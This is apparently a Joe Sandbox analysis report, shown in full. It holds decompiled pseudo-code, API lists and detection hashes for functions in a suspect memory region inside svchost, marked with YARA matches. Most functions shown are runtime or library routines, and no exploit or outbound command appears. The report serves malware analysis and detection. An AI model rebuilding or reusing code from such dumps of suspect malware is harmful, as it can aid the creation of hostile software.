                                                            				__rcx[1] =  *((intOrPtr*)(0xaf599790 + (__edx >> 6) * 8));
                                                            				if (__r8 - _t103 >= 0) goto 0xaf576547;
                                                            				_t66 =  &_a40;
                                                            				if (__r8 - _t103 >= 0) goto 0xaf5764af;
                                                            				_t40 =  *__r8 & 0x0000ffff;
                                                            				if (_t40 != 0xa) goto 0xaf57649b;
                                                            				 *_t66 = 0xd;
                                                            				_t67 = _t66 + 2;
                                                            				 *_t67 = _t40;
                                                            				if ( &(_t67[0]) -  &_a1744 < 0) goto 0xaf57647d;
                                                            				_a16 = _a16 & 0x00000000;
                                                            				_a8 = _a8 & 0x00000000;
                                                            				_v0 = 0xd55;
                                                            				_v8 =  &_a1752;
                                                            				r9d = 0;
                                                            				_t33 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
                                                            				_t49 = _t33;
                                                            				if (_t33 == 0) goto 0xaf57653f;
                                                            				if (_t33 == 0) goto 0xaf57652f;
                                                            				_v8 = _v8 & 0x00000000;
                                                            				r8d = _t49;
                                                            				r8d = r8d;
                                                            				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0xaf57653f;
                                                            				if (0 + _a24 - _t49 < 0) goto 0xaf5764fc;
                                                            				__rcx[1] = __edi - r15d;
                                                            				goto 0xaf576472;
                                                            				 *__rcx = GetLastError();
                                                            				return E0000022B22BAF55A7C0(0, __rcx, _a5176 ^ _t90 - __rax);
                                                            			}


















                                                            0x22baf576404
                                                            0x22baf576409
                                                            0x22baf57641b
                                                            0x22baf576423
                                                            0x22baf57642d
                                                            0x22baf57643e
                                                            0x22baf57644c
                                                            0x22baf576450
                                                            0x22baf576468
                                                            0x22baf57646b
                                                            0x22baf576472
                                                            0x22baf576478
                                                            0x22baf576480
                                                            0x22baf576482
                                                            0x22baf57648d
                                                            0x22baf576494
                                                            0x22baf576497
                                                            0x22baf57649b
                                                            0x22baf5764ad
                                                            0x22baf5764af
                                                            0x22baf5764ba
                                                            0x22baf5764c8
                                                            0x22baf5764db
                                                            0x22baf5764e0
                                                            0x22baf5764ea
                                                            0x22baf5764f0
                                                            0x22baf5764f4
                                                            0x22baf5764fa
                                                            0x22baf5764fc
                                                            0x22baf576511
                                                            0x22baf57651a
                                                            0x22baf576525
                                                            0x22baf57652d
                                                            0x22baf576534
                                                            0x22baf57653a
                                                            0x22baf576545
                                                            0x22baf576575

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharErrorFileLastMultiWideWrite
                                                            • String ID: U
                                                            • API String ID: 2456169464-4171548499
                                                            • Opcode ID: e0c28abbd6a968b68e3e1d38b02201de836fca2a953810b05ad8378aa4e01fec
                                                            • Instruction ID: 504b8d38489d834855236873171ff337f373c8d0361f598650876d4bca456db4
                                                            • Opcode Fuzzy Hash: e0c28abbd6a968b68e3e1d38b02201de836fca2a953810b05ad8378aa4e01fec
                                                            • Instruction Fuzzy Hash: F841A223725A80A6EB218FA6F44C7EA77A1F788B94F844421EE4D87799DF3DC441CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 51%
                                                            			E0000022B22BAF57994E(void* __rax, void* __rbx, intOrPtr _a32, intOrPtr _a40, intOrPtr _a48, intOrPtr _a56, long long _a64, intOrPtr* _a80, intOrPtr _a176, intOrPtr* _a184, long long _a192, intOrPtr _a200) {
                                                            				void* _t35;
                                                            				intOrPtr _t49;
                                                            				intOrPtr* _t63;
                                                            
                                                            				_a32 = 1;
                                                            				E0000022B22BAF563AB8(__rax);
                                                            				 *(__rax + 0x40) =  *(__rax + 0x40) & 0x00000000;
                                                            				_t63 = _a184;
                                                            				if (_a176 == 0) goto 0xaf579992;
                                                            				E0000022B22BAF578B28(1, __rbx, _t63);
                                                            				_t49 = _a200;
                                                            				r8d =  *((intOrPtr*)(_t49 + 0x18));
                                                            				goto 0xaf57999f;
                                                            				r8d =  *((intOrPtr*)(_t63 + 0x18));
                                                            				RaiseException(??, ??, ??, ??);
                                                            				r15d = _a32;
                                                            				E0000022B22BAF578794(_t49, _a40, _a56);
                                                            				if (r15d != 0) goto 0xaf579a05;
                                                            				if ( *_t63 != 0xe06d7363) goto 0xaf579a05;
                                                            				if ( *((intOrPtr*)(_t63 + 0x18)) != 4) goto 0xaf579a05;
                                                            				if ( *((intOrPtr*)(_t63 + 0x20)) - 0x19930520 - 2 > 0) goto 0xaf579a05;
                                                            				if (E0000022B22BAF578814(_t49,  *((intOrPtr*)(_t63 + 0x28))) == 0) goto 0xaf579a05;
                                                            				E0000022B22BAF578B28(1, _a40, _t63);
                                                            				E0000022B22BAF563AB8(_t49);
                                                            				 *((long long*)(_t49 + 0x20)) = _a192;
                                                            				_t35 = E0000022B22BAF563AB8(_t49);
                                                            				 *((long long*)(_t49 + 0x28)) = _a64;
                                                            				 *((long long*)( *((intOrPtr*)(_a48 + 0x1c)) +  *_a80)) = 0xfffffffe;
                                                            				return _t35;
                                                            			}






                                                            0x22baf57994e
                                                            0x22baf579956
                                                            0x22baf57995b
                                                            0x22baf57995f
                                                            0x22baf57996f
                                                            0x22baf579976
                                                            0x22baf57997b
                                                            0x22baf579987
                                                            0x22baf579990
                                                            0x22baf579996
                                                            0x22baf57999f
                                                            0x22baf5799a5
                                                            0x22baf5799c9
                                                            0x22baf5799d1
                                                            0x22baf5799d9
                                                            0x22baf5799df
                                                            0x22baf5799ec
                                                            0x22baf5799f9
                                                            0x22baf579a00
                                                            0x22baf579a05
                                                            0x22baf579a0a
                                                            0x22baf579a0e
                                                            0x22baf579a13
                                                            0x22baf579a23
                                                            0x22baf579a3d

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                            • String ID: csm
                                                            • API String ID: 2280078643-1018135373
                                                            • Opcode ID: f795676adab844364cbbdec4aadcf85fb7ae3005bb5634ee2150d941269cf22d
                                                            • Instruction ID: 47136862164bcd4d2a761679d9ba7f80e598c32839f3abf9fdd57a1189b13dd8
                                                            • Opcode Fuzzy Hash: f795676adab844364cbbdec4aadcf85fb7ae3005bb5634ee2150d941269cf22d
                                                            • Instruction Fuzzy Hash: A5215C3720068096EA71DF96E04879EB7A0F389BA5F055601DE9A03796DF3AD886CB10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Monitor$DisplayEnumFromInfoSettingsWindow
                                                            • String ID: h
                                                            • API String ID: 2498085031-2439710439
                                                            • Opcode ID: a9248070bc806020c395ec4d2972dd80648afb6a2d026f0d11748e547005f718
                                                            • Instruction ID: 31d4ed014b61c2e5799c71eaa48785013496274d2b2505d9ef767dad17cd4eae
                                                            • Opcode Fuzzy Hash: a9248070bc806020c395ec4d2972dd80648afb6a2d026f0d11748e547005f718
                                                            • Instruction Fuzzy Hash: 6411CD33A04A849BD772CF75E00938EB3A1F789780F408226DB691374ADF3AD456CB10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 45%
                                                            			E0000022B22BAF531260(void* __eflags, long long __rbx, long long* __rcx, long long __rdi, long long __rsi) {
                                                            				void* _t45;
                                                            				long long* _t50;
                                                            				long long* _t56;
                                                            				long long _t62;
                                                            				void* _t64;
                                                            				struct _SECURITY_ATTRIBUTES* _t67;
                                                            
                                                            				_t45 = __eflags;
                                                            				 *((long long*)(_t64 + 8)) = __rbx;
                                                            				 *((long long*)(_t64 + 0x10)) = _t62;
                                                            				 *((long long*)(_t64 + 0x18)) = __rsi;
                                                            				 *((long long*)(_t64 + 0x20)) = __rdi;
                                                            				_t50 = __rcx;
                                                            				 *__rcx = 0xaf586050;
                                                            				r9d = 0;
                                                            				r8d = 0;
                                                            				CreateEventW(_t67, ??, ??);
                                                            				r9d = 0;
                                                            				r8d = 0;
                                                            				 *((long long*)(__rcx + 0x40)) = 0xaf586050;
                                                            				CreateEventW(??, ??, ??, ??);
                                                            				 *((intOrPtr*)(__rcx + 8)) = 0x3e8;
                                                            				 *((long long*)(__rcx + 0x48)) = 0xaf586050;
                                                            				_t56 = __rcx + 0x58;
                                                            				 *((long long*)(__rcx + 0x50)) = _t62;
                                                            				 *((long long*)(__rcx + 0x38)) = _t62;
                                                            				 *((short*)(__rcx + 0x80)) = 0;
                                                            				E0000022B22BAF55A828(0,  *((intOrPtr*)(__rcx + 8)));
                                                            				 *((long long*)(_t56 - 0x48)) = 0xaf586050;
                                                            				E0000022B22BAF55A7EC(0xaf586050,  *((intOrPtr*)(__rcx + 8)));
                                                            				 *_t56 = 0xaf586050;
                                                            				E0000022B22BAF55A828(0,  *((intOrPtr*)(_t50 + 8)));
                                                            				 *((long long*)(_t56 - 0x38)) = 0xaf586050;
                                                            				E0000022B22BAF55A7EC(0xaf586050,  *((intOrPtr*)(_t50 + 8)));
                                                            				 *((long long*)(_t56 + 0x10)) = 0xaf586050;
                                                            				if (_t45 != 0) goto 0xaf5312d0;
                                                            				 *((long long*)(_t50 + 0x82)) = 0xaf586050;
                                                            				 *((long long*)(_t50 + 0x8a)) = 0xaf586050;
                                                            				 *((long long*)(_t50 + 0x8e)) = 0x41;
                                                            				 *((intOrPtr*)(_t50 + 0x92)) = 0x1400002;
                                                            				 *((intOrPtr*)(_t50 + 0x82)) = 0x10031;
                                                            				 *((intOrPtr*)(_t50 + 0x86)) = 0x1f40;
                                                            				 *((intOrPtr*)(_t50 + 0x8a)) = 0x659;
                                                            				return 0;
                                                            			}









                                                            0x22baf531260
                                                            0x22baf531260
                                                            0x22baf531265
                                                            0x22baf53126a
                                                            0x22baf53126f
                                                            0x22baf531281
                                                            0x22baf531284
                                                            0x22baf531287
                                                            0x22baf53128c
                                                            0x22baf531291
                                                            0x22baf531297
                                                            0x22baf53129a
                                                            0x22baf53129f
                                                            0x22baf5312a5
                                                            0x22baf5312ad
                                                            0x22baf5312b4
                                                            0x22baf5312b8
                                                            0x22baf5312bc
                                                            0x22baf5312c0
                                                            0x22baf5312c7
                                                            0x22baf5312d4
                                                            0x22baf5312de
                                                            0x22baf5312e2
                                                            0x22baf5312e7
                                                            0x22baf5312ee
                                                            0x22baf5312f8
                                                            0x22baf5312fc
                                                            0x22baf531301
                                                            0x22baf53130d
                                                            0x22baf531320
                                                            0x22baf531327
                                                            0x22baf531331
                                                            0x22baf53133c
                                                            0x22baf531346
                                                            0x22baf531350
                                                            0x22baf53135a
                                                            0x22baf53136f

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateEvent
                                                            • String ID: 1$A
                                                            • API String ID: 2692171526-719046165
                                                            • Opcode ID: d0a89945a4dfec4dc7c7752293a85f15a975431378bda52a400bb942abf87683
                                                            • Instruction ID: 54308780df568dc9d6474f1499b5c44bb3f1fbcaba86b5aebb3937e8a6b650ee
                                                            • Opcode Fuzzy Hash: d0a89945a4dfec4dc7c7752293a85f15a975431378bda52a400bb942abf87683
                                                            • Instruction Fuzzy Hash: 71215733600B8096E725CFB1E44938E33B8F748B48F448029DB889BB5ADF79C465C744
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Open$Close
                                                            • String ID: SOFTWARE\Classes\.codein
                                                            • API String ID: 3083169812-3041101089
                                                            • Opcode ID: 483133b999c18be68aa19b572519b3e79d78ae31d44a88618e419bfde116a11d
                                                            • Instruction ID: 9e67a46dcdee4d8c4fc96a0aa71d34b94b054a3e09171151727c8b9400276bad
                                                            • Opcode Fuzzy Hash: 483133b999c18be68aa19b572519b3e79d78ae31d44a88618e419bfde116a11d
                                                            • Instruction Fuzzy Hash: 94F06236714B91E2DB614BA9F84D7867364F780794F800211EE6C42BA9EF2EC119CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 2574300362-192647395
                                                            • Opcode ID: 3a1fed655c33226568eb5ac8b2742cfa3bc95c78cd58555e1ff07cc808341662
                                                            • Instruction ID: d4c72c873738643c4ce64c49fbd9756b9eab7ef68f6c94181f5b3cff578bdde7
                                                            • Opcode Fuzzy Hash: 3a1fed655c33226568eb5ac8b2742cfa3bc95c78cd58555e1ff07cc808341662
                                                            • Instruction Fuzzy Hash: 3DF01232618A4092EE72AB94F84A29A73A1F788701F904125E6CE82669DF3DC555C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 15%
                                                            			E0000022B22BAF556020(long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8) {
                                                            				signed int _t21;
                                                            				void* _t27;
                                                            				long long _t65;
                                                            				void* _t68;
                                                            				void* _t69;
                                                            				long _t75;
                                                            
                                                            				 *((long long*)(_t68 + 0x18)) = __rsi;
                                                            				 *((long long*)(_t68 + 0x20)) = __rdi;
                                                            				_t69 = _t68 - 0x20;
                                                            				 *((long long*)(_t69 + 0x38)) = _t65;
                                                            				if ( *((intOrPtr*)(__rcx + 0x10)) != 0) goto 0xaf55606b;
                                                            				SetLastError(_t75);
                                                            				r9d =  *((intOrPtr*)(__r8 + 0x30));
                                                            				 *((intOrPtr*)( *__rcx + 0x1d8))();
                                                            				goto 0xaf5560cc;
                                                            				if (__rdx == 0) goto 0xaf5560cc;
                                                            				if ( *((intOrPtr*)(__rdx + 0x40)) == 0) goto 0xaf5560cc;
                                                            				 *((long long*)(_t69 + 0x30)) = __rbx;
                                                            				_t27 =  ==  ? 0x90 : 0x68;
                                                            				EnterCriticalSection(??);
                                                            				if ( *((intOrPtr*)(__rdx + 0x40)) == 0) goto 0xaf5560be;
                                                            				SetLastError(??);
                                                            				r9d =  *((intOrPtr*)(__r8 + 0x30));
                                                            				_t21 =  *((intOrPtr*)( *__rcx + 0x1d8))();
                                                            				LeaveCriticalSection(??);
                                                            				asm("lock xadd [edi+0x44], eax");
                                                            				if ((_t21 | 0xffffffff) != 1) goto 0xaf556103;
                                                            				if (E0000022B22BAF54FD40( *((intOrPtr*)(_t69 + 0x30)), __rcx + 0x100, __r8) != 0) goto 0xaf556103;
                                                            				HeapFree(??, ??, ??);
                                                            				return _t21;
                                                            			}









                                                            0x22baf556020
                                                            0x22baf556025
                                                            0x22baf55602c
                                                            0x22baf556033
                                                            0x22baf556048
                                                            0x22baf55604a
                                                            0x22baf556056
                                                            0x22baf556061
                                                            0x22baf556069
                                                            0x22baf55606e
                                                            0x22baf556074
                                                            0x22baf556076
                                                            0x22baf556088
                                                            0x22baf556091
                                                            0x22baf55609b
                                                            0x22baf55609f
                                                            0x22baf5560ab
                                                            0x22baf5560b6
                                                            0x22baf5560c1
                                                            0x22baf5560cf
                                                            0x22baf5560dc
                                                            0x22baf5560ef
                                                            0x22baf5560fd
                                                            0x22baf556115

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterFreeHeapLeave
                                                            • String ID:
                                                            • API String ID: 132096965-0
                                                            • Opcode ID: efe496b2c1ba782f518c328a89f63070b670fd06deedf763cef302dfa826861c
                                                            • Instruction ID: 618835895ea71aab104f591146f90ac1ac7caf14c82e37a127c0d5f93c721a19
                                                            • Opcode Fuzzy Hash: efe496b2c1ba782f518c328a89f63070b670fd06deedf763cef302dfa826861c
                                                            • Instruction Fuzzy Hash: 0E216032200A8097EB65CB66E55C3AD77A0FB88FD4F185121DE0A53BA6CF3AD855C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 2124651672-0
                                                            • Opcode ID: 786c64156ef70aaaffb7b58ecd6420f5d2136124ef28094095967dc66d24b164
                                                            • Instruction ID: 40ac4c50c85ee0450926b8e7e3a98bef2b84e3fc548124dd12d2d16b7e46176f
                                                            • Opcode Fuzzy Hash: 786c64156ef70aaaffb7b58ecd6420f5d2136124ef28094095967dc66d24b164
                                                            • Instruction Fuzzy Hash: A5014C37210A48E3EB658F56E85C39C7361F784B99F191625DA6B07BE5CF7AC4428700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 78%
                                                            			E0000022B22BAF54B2D0(void* __eax, signed char __ecx, long long __rbx, long long __rcx, unsigned int __rdx, long long __r8, void* _a8, long long _a16, long long _a24, long long _a32) {
                                                            				long long _v32;
                                                            				long long _v40;
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				void* _t39;
                                                            				signed char _t40;
                                                            				void* _t42;
                                                            				void* _t44;
                                                            				long long _t65;
                                                            				intOrPtr _t66;
                                                            				intOrPtr _t68;
                                                            				long long* _t73;
                                                            				unsigned long long _t78;
                                                            				void* _t79;
                                                            				long long _t82;
                                                            				void* _t83;
                                                            				long long _t94;
                                                            				long long _t98;
                                                            				unsigned long long _t103;
                                                            				long long _t106;
                                                            
                                                            				_t40 = __ecx;
                                                            				_a24 = __r8;
                                                            				_a16 = __rdx;
                                                            				_a8 = __rcx;
                                                            				_v32 = 0xfffffffe;
                                                            				_a32 = __rbx;
                                                            				if ((__rdx | 0x0000000f) - 0xfffffffe <= 0) goto 0xaf54b30d;
                                                            				goto 0xaf54b342;
                                                            				_t103 =  *((intOrPtr*)(__rcx + 0x18));
                                                            				_t78 = _t103 >> 1;
                                                            				if (_t78 - __rdx >> 1 <= 0) goto 0xaf54b342;
                                                            				if (_t103 - 0xfffffffe - _t78 > 0) goto 0xaf54b342;
                                                            				_t12 = _t78 + _t103 + 1; // 0xffffffff
                                                            				_t79 = _t12;
                                                            				if (_t79 != 0) goto 0xaf54b34f;
                                                            				goto 0xaf54b384;
                                                            				if (_t79 - 0x1000 < 0) goto 0xaf54b37c;
                                                            				_t65 = _t79 + 0x27;
                                                            				if (_t65 - _t79 > 0) goto 0xaf54b366;
                                                            				E0000022B22BAF55B374(_t65 - _t79, _t65);
                                                            				E0000022B22BAF55A7EC(_t65, _t65);
                                                            				_t14 = _t65 + 0x27; // 0x27
                                                            				 *((long long*)((_t14 & 0xffffffe0) - 8)) = _t65;
                                                            				goto 0xaf54b384;
                                                            				E0000022B22BAF55A7EC(_t65, _t65);
                                                            				_v40 = _t65;
                                                            				_t73 = _a8;
                                                            				_t106 = _a24;
                                                            				_t94 = _a16;
                                                            				_t98 = _v40;
                                                            				if (_t106 == 0) goto 0xaf54b3c3;
                                                            				if ( *((long long*)(_t73 + 0x18)) - 0x10 < 0) goto 0xaf54b3b0;
                                                            				goto 0xaf54b3b3;
                                                            				if (_t106 == 0) goto 0xaf54b3c3;
                                                            				_t39 = E0000022B22BAF562BA0(__ecx, _t42, 0, _t44, _t98, _t73, _t94, _t98, _t106);
                                                            				_t66 =  *((intOrPtr*)(_t73 + 0x18));
                                                            				if (_t66 - 0x10 < 0) goto 0xaf54b418;
                                                            				_t82 =  *_t73;
                                                            				if (_t66 + 1 - 0x1000 < 0) goto 0xaf54b413;
                                                            				if ((_t40 & 0x0000001f) == 0) goto 0xaf54b3e6;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				_t68 =  *((intOrPtr*)(_t82 - 8));
                                                            				if (_t68 - _t82 < 0) goto 0xaf54b3f5;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				_t83 = _t82 - _t68;
                                                            				if (_t83 - 8 >= 0) goto 0xaf54b404;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				if (_t83 - 0x27 <= 0) goto 0xaf54b410;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				0xaf55a85c();
                                                            				 *((long long*)(_t73 + 0x18)) = 0xf;
                                                            				 *((long long*)(_t73 + 0x10)) = 0;
                                                            				if ( *((long long*)(_t73 + 0x18)) - 0x10 < 0) goto 0xaf54b434;
                                                            				goto 0xaf54b437;
                                                            				 *_t73 = 0;
                                                            				 *_t73 = _t98;
                                                            				 *((long long*)(_t73 + 0x18)) = _t94;
                                                            				 *((long long*)(_t73 + 0x10)) = _t106;
                                                            				if ( *((long long*)(_t73 + 0x18)) - 0x10 < 0) goto 0xaf54b44f;
                                                            				 *((char*)(_t98 + _t106)) = 0;
                                                            				return _t39;
                                                            			}























                                                            0x22baf54b2d0
                                                            0x22baf54b2d0
                                                            0x22baf54b2d5
                                                            0x22baf54b2da
                                                            0x22baf54b2e7
                                                            0x22baf54b2f0
                                                            0x22baf54b306
                                                            0x22baf54b30b
                                                            0x22baf54b30d
                                                            0x22baf54b314
                                                            0x22baf54b32a
                                                            0x22baf54b33c
                                                            0x22baf54b342
                                                            0x22baf54b342
                                                            0x22baf54b349
                                                            0x22baf54b34d
                                                            0x22baf54b356
                                                            0x22baf54b358
                                                            0x22baf54b35f
                                                            0x22baf54b361
                                                            0x22baf54b369
                                                            0x22baf54b36e
                                                            0x22baf54b376
                                                            0x22baf54b37a
                                                            0x22baf54b37c
                                                            0x22baf54b384
                                                            0x22baf54b38b
                                                            0x22baf54b390
                                                            0x22baf54b395
                                                            0x22baf54b39a
                                                            0x22baf54b3a2
                                                            0x22baf54b3a9
                                                            0x22baf54b3ae
                                                            0x22baf54b3b6
                                                            0x22baf54b3be
                                                            0x22baf54b3c3
                                                            0x22baf54b3cb
                                                            0x22baf54b3d0
                                                            0x22baf54b3d9
                                                            0x22baf54b3de
                                                            0x22baf54b3e0
                                                            0x22baf54b3e5
                                                            0x22baf54b3e6
                                                            0x22baf54b3ed
                                                            0x22baf54b3ef
                                                            0x22baf54b3f4
                                                            0x22baf54b3f5
                                                            0x22baf54b3fc
                                                            0x22baf54b3fe
                                                            0x22baf54b403
                                                            0x22baf54b408
                                                            0x22baf54b40a
                                                            0x22baf54b40f
                                                            0x22baf54b413
                                                            0x22baf54b418
                                                            0x22baf54b420
                                                            0x22baf54b42d
                                                            0x22baf54b432
                                                            0x22baf54b437
                                                            0x22baf54b43a
                                                            0x22baf54b43d
                                                            0x22baf54b441
                                                            0x22baf54b44a
                                                            0x22baf54b44f
                                                            0x22baf54b461

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$ExceptionThrowstd::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 545805781-0
                                                            • Opcode ID: d179f111113740c56c3e40622377fc0a32f1fd94990e7d2f3d7b479b98b365ef
                                                            • Instruction ID: dcccbd34ff3cb5786dd2a12c05d23b4d7c7e72537bbb52cb39181ad26b3ca607
                                                            • Opcode Fuzzy Hash: d179f111113740c56c3e40622377fc0a32f1fd94990e7d2f3d7b479b98b365ef
                                                            • Instruction Fuzzy Hash: 71418F33A15B44B0FA3A9AE6904E3DC73A2E744BA5F5407209A79077DBDF76C4918381
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 92%
                                                            			E0000022B22BAF571FBC(signed int __edx, void* __edi, void* __esp, intOrPtr* __rax, long long __rbx, signed int* __rcx, void* __rdx, long long __rsi, void* __r8, long long _a8, long long _a24, signed short _a32, intOrPtr _a40) {
                                                            				void* _v8;
                                                            				char _v16;
                                                            				intOrPtr* _v32;
                                                            				char _v40;
                                                            				void* __rdi;
                                                            				void* _t17;
                                                            				intOrPtr* _t43;
                                                            				void* _t55;
                                                            
                                                            				_a8 = __rbx;
                                                            				_a24 = __rsi;
                                                            				_a32 = r9w;
                                                            				_t55 = __rdx;
                                                            				if (__rdx != 0) goto 0xaf571ff2;
                                                            				if (__r8 == 0) goto 0xaf571ff2;
                                                            				if (__rcx == 0) goto 0xaf571feb;
                                                            				 *__rcx =  *__rcx & __edx;
                                                            				goto 0xaf572081;
                                                            				if (__rcx == 0) goto 0xaf571ffa;
                                                            				 *__rcx =  *__rcx | 0xffffffff;
                                                            				if (__r8 - 0x7fffffff <= 0) goto 0xaf572016;
                                                            				_t17 = E0000022B22BAF567054(__rax);
                                                            				 *__rax = 0x16;
                                                            				E0000022B22BAF564328(_t17);
                                                            				goto 0xaf57207f;
                                                            				E0000022B22BAF56440C(__rax, __rcx,  &_v40, _a40);
                                                            				_t43 = _v32;
                                                            				if ( *((long long*)(_t43 + 0x138)) != 0) goto 0xaf5720b0;
                                                            				if ((_a32 & 0x0000ffff) - 0xff <= 0) goto 0xaf572093;
                                                            				if (_t55 == 0) goto 0xaf572060;
                                                            				if (__r8 == 0) goto 0xaf572060;
                                                            				E0000022B22BAF563830(0xff, 0, __edi, __esp, _t55, _a40, __r8, __r8);
                                                            				E0000022B22BAF567054(_t43);
                                                            				 *_t43 = 0x2a;
                                                            				if (_v16 == 0) goto 0xaf57207f;
                                                            				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
                                                            				return 0x2a;
                                                            			}











                                                            0x22baf571fbc
                                                            0x22baf571fc1
                                                            0x22baf571fc6
                                                            0x22baf571fd4
                                                            0x22baf571fdd
                                                            0x22baf571fe2
                                                            0x22baf571fe7
                                                            0x22baf571fe9
                                                            0x22baf571fed
                                                            0x22baf571ff5
                                                            0x22baf571ff7
                                                            0x22baf572001
                                                            0x22baf572003
                                                            0x22baf57200d
                                                            0x22baf57200f
                                                            0x22baf572014
                                                            0x22baf572023
                                                            0x22baf572028
                                                            0x22baf572035
                                                            0x22baf572047
                                                            0x22baf57204c
                                                            0x22baf572051
                                                            0x22baf57205b
                                                            0x22baf572060
                                                            0x22baf57206a
                                                            0x22baf572071
                                                            0x22baf572078
                                                            0x22baf572092

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                            • String ID:
                                                            • API String ID: 4141327611-0
                                                            • Opcode ID: 49d5ea05e627631afe78f50cb6792a66ccb26636e1ed8aa2d18b4d5ad3875411
                                                            • Instruction ID: 628d8b85e93a71575697f05a7d6b94d9df63c5960bb0bbdd3761e7887139c444
                                                            • Opcode Fuzzy Hash: 49d5ea05e627631afe78f50cb6792a66ccb26636e1ed8aa2d18b4d5ad3875411
                                                            • Instruction Fuzzy Hash: F4417163604780A6FF779BD1D44C3E97BA1EB80B90F1885209B9546EDBDF3AC842CB10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$CompletionPostQueuedStatusSwitchThread
                                                            • String ID:
                                                            • API String ID: 3621116444-0
